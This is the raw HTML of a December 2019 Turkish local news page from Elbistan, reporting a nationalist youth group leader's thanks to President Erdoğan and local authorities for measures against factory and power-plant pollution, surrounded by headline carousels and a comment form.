<img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/istikbal_taYkYnlar_1.jpg&w=980&h=300&q=90" width="980" height="300" style="width:980px;height: 300px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-engel-yok-sevgi-var-h64971.html" title="Başkan Gürbüz, “Engel yok sevgi var”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/12/belediye_engelliler_2.jpg" alt="Başkan Gürbüz, “Engel yok sevgi var”" class="pull-left" /> <div class="caption-line"><p>Başkan Gürbüz, “Engel yok sevgi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/trafik-polisleri-kis-lastigi-denetimine-basladi-h64968.html" title="Trafik polisleri, kış lastiği denetimine başladı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/12/kYY_lastiYi_denetimi_2.jpg" alt="Trafik polisleri, kış lastiği denetimine başladı" class="pull-left" /> <div class="caption-line"><p>Trafik polisleri, kış lastiği denetimine...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogana-tesekkur-ettiler-h64965.html" title="Cumhurbaşkanı Erdoğan’a teşekkür ettiler" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/12/cumhurbaYkanYna_teYekkur_ettiler_2.jpg" alt="Cumhurbaşkanı Erdoğan’a teşekkür ettiler" class="pull-left" /> <div class="caption-line"><p>Cumhurbaşkanı Erdoğan’a teşekkür ettiler</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-halkimizin-zehirlenmesine-izin-veremeyiz-h64959.html" title="Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin veremeyiz”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/12/images_1_1.jpg" alt="Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin veremeyiz”" class="pull-left" /> <div class="caption-line"><p>Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-termik-santrallere-filtre-uzatmasini-veto-etti-h64952.html" title="Cumhurbaşkanı Erdoğan, termik santrallere filtre uzatmasını veto etti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/12/images_1.jpg" alt="Cumhurbaşkanı Erdoğan, termik santrallere filtre uzatmasını veto etti" class="pull-left" /> <div class="caption-line"><p>Cumhurbaşkanı Erdoğan, termik santrallere filtre...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü</h1> <h2 class="lead" itemprop="description"><strong> Elbistan Ülkü Ocakları Başkanı Muhammet Kaya, ilçede yaşanan hava ve çevre kirliliğinin önüne geçilmesi noktasında gerekli adımları atan başta Cumhurbaşkanı Recep Tayyip Erdoğan ve ilçemin mülki-idari amirlerine teşekkür etti.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-12-03 18:49:57" content="2019-12-03T18:49:57+02:00">03 Aralık 2019 Salı 18:49</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" alt="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt;tab-stops:10.0cm"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Konuyla ilgili açıklamasında, ‘Elbistan halkının derdiyle derleniyor, refah ve temiz bir Elbistan için mücadele ediyoruz’ diyen Elbistan Ülkü Ocakları Başkanı Muhammet Kaya, “Geçtiğimiz günlerde şeker fabrikasından yayılan kötü koku ve termik santralden atmosfere verilen zehirli gazlar nedeniyle yaptığımız basın açıklaması kutlu devletimizin Elbistan’daki temsilcilerini harekete geçirmiştir. Şeker fabrikasının yaymış olduğu kötü koku nedeni ile rekor para cezası ile tazyik edilmiş, termik santraline filtre takılmasını erteleyen yasa ise, Cumhurbaşkanımız Sayın Recep Tayyip Erdoğan tarafından veto edilmiştir. Ülkü Ocakları Eğitim ve Kültür Vakfı olarak;&#160; ‘Çevrecilik milliyetçiliktir’ çıkışımız netice vermiştir. Elbistan halkının derdiyle derleniyor, refah ve temiz bir Elbistan için mücadele ediyoruz. “İnsanı yaşat ki devlet yaşasın” iradesi ışığında; eğitimde genç, fikirde hür, çevrede temiz, ilimde çağdaş, ekonomide güçlü ve gelişmişlikte çağlar üstü bir hedefe odaklanmış bir Elbistan, bir Türkiye için çabalıyoruz. Elbistan halkının haklı talebine kayıtsız kalmayarak, çevre kirliliği için gerekli idari yaptırımları gerçekleştiren Elbistan’ımızın mülki-idari birimlerine Elbistan Ülkü Ocakları olarak teşekkür ederiz” ifadelerini kullandı.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogana-tesekkur-ettiler-h64965.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bariyerlere-carpan-motosikletin-surucusu-hayatini-kaybetti-h64972.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-engel-yok-sevgi-var-h64971.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-halkimizin-zehirlenmesine-izin-veremeyiz-h64959.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-dogru-bir-karar-alindi-h64958.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polisten-tekerlekli-sandalye-hediyesi-h64969.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/trafik-polisleri-kis-lastigi-denetimine-basladi-h64968.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/heleteliler-halkgross-2-torenle-hizmete-acildi-h64967.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/engellilere-yasal-haklari-anlatildi-ve-sorunlari-gorusuldu-h64966.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-kilictan-engelliler-gunu-mesaji-h64960.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-okullarina-beyaz-bayrak-h64954.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tarim-kredi-kooperatifinden-ciftcilere-toprak-analizi-hizmeti-h64953.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-termik-santrallere-filtre-uzatmasini-veto-etti-h64952.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/once-traktore-sonra-direge-carpti-1i-agir-3-yarali-h64950.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-sultanlari-sahadan-3-0-yenik-ayrildi-h64948.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-puturge-belediyesporu-eli-bos-gonderdi-h64947.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polisin-dur-ihtarina-uymayip-kacan-otomobil-kaza-yapti-h64945.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-mermeri-cin-yolunda-h64937.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/besi-osbde-yeni-donemin-kapisi-aralandi-h64944.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-sungur-yeni-adalet-sarayimiz-hayirli-olsun-h64940.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hayat-mucadelesini-yeni-ekmek-sandigi-ile-surdurecek-h64935.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cezaevi-hali-saha-turnuvasi-sona-erdi-h64941.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogana-tesekkur-ettiler-h64965.html" title="Cumhurbaşkanı Erdoğan’a teşekkür ettiler"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/cumhurbaskani_erdogana_tesekkur_ettiler_h64965_1c166.JPG" alt="Cumhurbaşkanı Erdoğan’a teşekkür ettiler" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan’a teşekkür ettiler</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bariyerlere-carpan-motosikletin-surucusu-hayatini-kaybetti-h64972.html" title="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/bariyerlere_carpan_motosikletin_surucusu_hayatini_kaybetti_h64972_ce48e.JPG" alt="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-engel-yok-sevgi-var-h64971.html" title="Başkan Gürbüz, “Engel yok sevgi var”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/baskan_gurbuz_engel_yok_sevgi_var_h64971_657c6.jpg" alt="Başkan Gürbüz, “Engel yok sevgi var”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz, “Engel yok sevgi var”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-halkimizin-zehirlenmesine-izin-veremeyiz-h64959.html" title="Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin veremeyiz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/cumhurbaskani_erdogan_halkimizin_zehirlenmesine_izin_veremeyiz_h64959_a265f.jpg" alt="Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin veremeyiz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan: “Halkımızın zehirlenmesine izin veremeyiz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-dogru-bir-karar-alindi-h64958.html" title="Öztunç: &#039;Doğru bir karar alındı&#039;"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/oztunc_dogru_bir_karar_alindi_h64958_205a4.jpg" alt="Öztunç: &#039;Doğru bir karar alındı&#039;" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: &#039;Doğru bir karar alındı&#039;</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html" title="Ünal&#039;dan Cumhurbaşkanı Erdoğan&#039;a teşekkür"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/unal_dan_cumhurbaskani_erdogan_a_tesekkur_h64957_51910.jpg" alt="Ünal&#039;dan Cumhurbaşkanı Erdoğan&#039;a teşekkür" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal&#039;dan Cumhurbaşkanı Erdoğan&#039;a teşekkür</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html" title="Başkan Arslan’dan ‘veto’ değerlendirmesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/baskan_arslandan_veto_degerlendirmesi_h64961_ff19e.JPG" alt="Başkan Arslan’dan ‘veto’ değerlendirmesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Arslan’dan ‘veto’ değerlendirmesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html" title="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" alt="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polisten-tekerlekli-sandalye-hediyesi-h64969.html" title="Polisten tekerlekli sandalye hediyesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/polisten_tekerlekli_sandalye_hediyesi_h64969_82716.JPG" alt="Polisten tekerlekli sandalye hediyesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polisten tekerlekli sandalye hediyesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/trafik-polisleri-kis-lastigi-denetimine-basladi-h64968.html" title="Trafik polisleri, kış lastiği denetimine başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/trafik_polisleri_kis_lastigi_denetimine_basladi_h64968_e8607.JPG" alt="Trafik polisleri, kış lastiği denetimine başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Trafik polisleri, kış lastiği denetimine başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/heleteliler-halkgross-2-torenle-hizmete-acildi-h64967.html" title="Heleteliler Halkgross 2, törenle hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/heleteliler_halkgross_2_torenle_hizmete_acildi_h64967_4551f.JPG" alt="Heleteliler Halkgross 2, törenle hizmete açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Heleteliler Halkgross 2, törenle hizmete açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/engellilere-yasal-haklari-anlatildi-ve-sorunlari-gorusuldu-h64966.html" title="Engellilere yasal hakları anlatıldı ve sorunları görüşüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/engellilere_yasal_haklari_anlatildi_ve_sorunlari_gorusuldu_h64966_43e27.JPG" alt="Engellilere yasal hakları anlatıldı ve sorunları görüşüldü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Engellilere yasal hakları anlatıldı ve sorunları görüşüldü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-kilictan-engelliler-gunu-mesaji-h64960.html" title="Başkan Kılıç’tan Engelliler Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/baskan_kilictan_engelliler_gunu_mesaji_h64960_86192.JPG" alt="Başkan Kılıç’tan Engelliler Günü mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Kılıç’tan Engelliler Günü mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-okullarina-beyaz-bayrak-h64954.html" title="Elbistan’ın okullarına ‘beyaz bayrak’"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/elbistanin_okullarina_beyaz_bayrak_h64954_c29de.jpg" alt="Elbistan’ın okullarına ‘beyaz bayrak’" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın okullarına ‘beyaz bayrak’</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tarim-kredi-kooperatifinden-ciftcilere-toprak-analizi-hizmeti-h64953.html" title="Tarım Kredi Kooperatifi’nden çiftçilere toprak analizi hizmeti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/tarim_kredi_kooperatifinden_ciftcilere_toprak_analizi_hizmeti_h64953_d935f.JPG" alt="Tarım Kredi Kooperatifi’nden çiftçilere toprak analizi hizmeti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Tarım Kredi Kooperatifi’nden çiftçilere toprak analizi hizmeti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-termik-santrallere-filtre-uzatmasini-veto-etti-h64952.html" title="Cumhurbaşkanı Erdoğan, termik santrallere filtre uzatmasını veto etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/cumhurbaskani_erdogan_termik_santrallere_filtre_uzatmasini_veto_etti_h64952_3f69e.jpg" alt="Cumhurbaşkanı Erdoğan, termik santrallere filtre uzatmasını veto etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan, termik santrallere filtre uzatmasını veto etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/once-traktore-sonra-direge-carpti-1i-agir-3-yarali-h64950.html" title="Önce traktöre sonra direğe çarptı: 1’i ağır 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/once_traktore_sonra_direge_carpti_1i_agir_3_yarali_h64950_7cdfb.JPG" alt="Önce traktöre sonra direğe çarptı: 1’i ağır 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Önce traktöre sonra direğe çarptı: 1’i ağır 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-sultanlari-sahadan-3-0-yenik-ayrildi-h64948.html" title="Elbistan’ın Sultanları, sahadan 3-0 yenik ayrıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/elbistanin_sultanlari_sahadan_3_0_yenik_ayrildi_h64948_95e5b.jpg" alt="Elbistan’ın Sultanları, sahadan 3-0 yenik ayrıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın Sultanları, sahadan 3-0 yenik ayrıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-puturge-belediyesporu-eli-bos-gonderdi-h64947.html" title="Elbistanspor, Pütürge Belediyespor’u eli boş gönderdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/12/elbistanspor_puturge_belediyesporu_eli_bos_gonderdi_h64947_bddcc.jpg" alt="Elbistanspor, Pütürge Belediyespor’u eli boş gönderdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, Pütürge Belediyespor’u eli boş gönderdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polisin-dur-ihtarina-uymayip-kacan-otomobil-kaza-yapti-h64945.html" title="Polisin &#039;dur&#039; ihtarına uymayıp kaçan otomobil kaza yaptı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/polisin_dur_ihtarina_uymayip_kacan_otomobil_kaza_yapti_h64945_e1608.jpg" alt="Polisin &#039;dur&#039; ihtarına uymayıp kaçan otomobil kaza yaptı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polisin &#039;dur&#039; ihtarına uymayıp kaçan otomobil kaza yaptı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-mermeri-cin-yolunda-h64937.html" title="Elbistan mermeri Çin yolunda"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/elbistan_mermeri_cin_yolunda_h64937_1038a.jpg" alt="Elbistan mermeri Çin yolunda" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan mermeri Çin yolunda</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/besi-osbde-yeni-donemin-kapisi-aralandi-h64944.html" title="Besi OSB’de yeni dönemin kapısı aralandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/besi_osbde_yeni_donemin_kapisi_aralandi_h64944_da701.JPG" alt="Besi OSB’de yeni dönemin kapısı aralandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Besi OSB’de yeni dönemin kapısı aralandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-sungur-yeni-adalet-sarayimiz-hayirli-olsun-h64940.html" title="Başkan Sungur: “Yeni Adalet Sarayımız hayırlı olsun”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/baskan_sungur_yeni_adalet_sarayimiz_hayirli_olsun_h64940_10017.JPG" alt="Başkan Sungur: “Yeni Adalet Sarayımız hayırlı olsun”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Sungur: “Yeni Adalet Sarayımız hayırlı olsun”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hayat-mucadelesini-yeni-ekmek-sandigi-ile-surdurecek-h64935.html" title="Hayat mücadelesini yeni ekmek sandığı ile sürdürecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/hayat_mucadelesini_yeni_ekmek_sandigi_ile_surdurecek_h64935_5b798.jpg" alt="Hayat mücadelesini yeni ekmek sandığı ile sürdürecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hayat mücadelesini yeni ekmek sandığı ile sürdürecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cezaevi-hali-saha-turnuvasi-sona-erdi-h64941.html" title="Cezaevi halı saha turnuvası sona erdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/cezaevi_hali_saha_turnuvasi_sona_erdi_h64941_20200.JPG" alt="Cezaevi halı saha turnuvası sona erdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cezaevi halı saha turnuvası sona erdi</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(64970);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="64970" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="546df4ca83579a2fe2584d18eaf584bebc37bc8f" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, 